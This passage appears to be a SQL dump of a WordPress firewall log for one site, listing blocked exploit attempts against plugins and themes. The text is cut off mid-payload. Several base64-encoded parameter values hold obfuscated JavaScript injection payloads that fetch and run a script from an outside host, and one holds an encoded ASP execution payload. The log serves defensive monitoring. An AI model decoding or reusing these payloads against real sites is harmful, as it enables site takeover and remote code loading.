0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37649,1569411631.658343,1569411630.755500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37650,1569411629.452411,1569411625.246900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37651,1569411624.292722,1569411622.884300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37797,1569949625.158020,1569949624.043200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYSovLDU4LypfYWFhYWFhKi8sNDcvKl9hYWFhYWEqLyw0Ny8qX2FhYWFhYSovLDEwMy8qX2FhYWFhYSovLDEwOC8qX2FhYWFhYSovLDk3LypfYWFhYWFhKi8sMTE1LypfYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWEqLywxMDgvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwMS8qX2FhYWFhYSovLDExNC8qX2FhYWFhYSovLDk4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwNC8qX2FhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sNDYvKl9hYWFhYWEqLyw5OS8qX2FhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhKi8sMTA4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sOTcvKl9hYWFhYWEqLywxMTQvKl9hYWFhYWEqLyw0Ni8qX2FhYWFhYSovLDEwNi8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDYzKTt2YXIgX2FhYWFhYSA9IF9hYWFhYWEoX2FhYWFhYSk7aWYoX2FhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhKF9hYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYShfYWFhYWFhKXsgdmFyIF9hYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhLCBmYWxzZSApO19hYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37652,1569411617.732630,1569411616.715000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37670,1569411709.691678,1569411708.838700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=wcp_change_post_width',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dpZHRoXQ==\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37653,1569411615.763933,1569411614.797700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37654,1569411611.315678,1569411605.563900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37624,1569411066.664151,1569411065.720100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37681,1569411739.833510,1569411739.007500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37646,1569411643.177934,1569411642.345000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWEqLyw1OC8qX2FhYWFhYWEqLyw0Ny8qX2FhYWFhYWEqLyw0Ny8qX2FhYWFhYWEqLywxMDMvKl9hYWFhYWFhKi8sMTA4LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDExNS8qX2FhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhKi8sMTA4LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDk4LypfYWFhYWFhYSovLDEwMS8qX2FhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYSovLDExNS8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTA0LypfYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYSovLDEwMS8qX2FhYWFhYWEqLyw0Ni8qX2FhYWFhYWEqLyw5OS8qX2FhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhKi8sMTA4LypfYWFhYWFhYSovLDEwMS8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTQvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sMTA2LypfYWFhYWFhYSovLDExNS8qX2FhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhID0gX2FhYWFhYWEoX2FhYWFhYWEpO2lmKF9hYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhKF9hYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhKF9hYWFhYWFhKXsgdmFyIF9hYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37665,1569411722.631512,1569411721.623000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37837,1569950032.394711,1569950030.862700,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYShfYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37878,1570515803.051705,1570515802.204700,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.44','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37913,1570674476.663650,1570674475.719500,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//config/AspCms_Config.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1N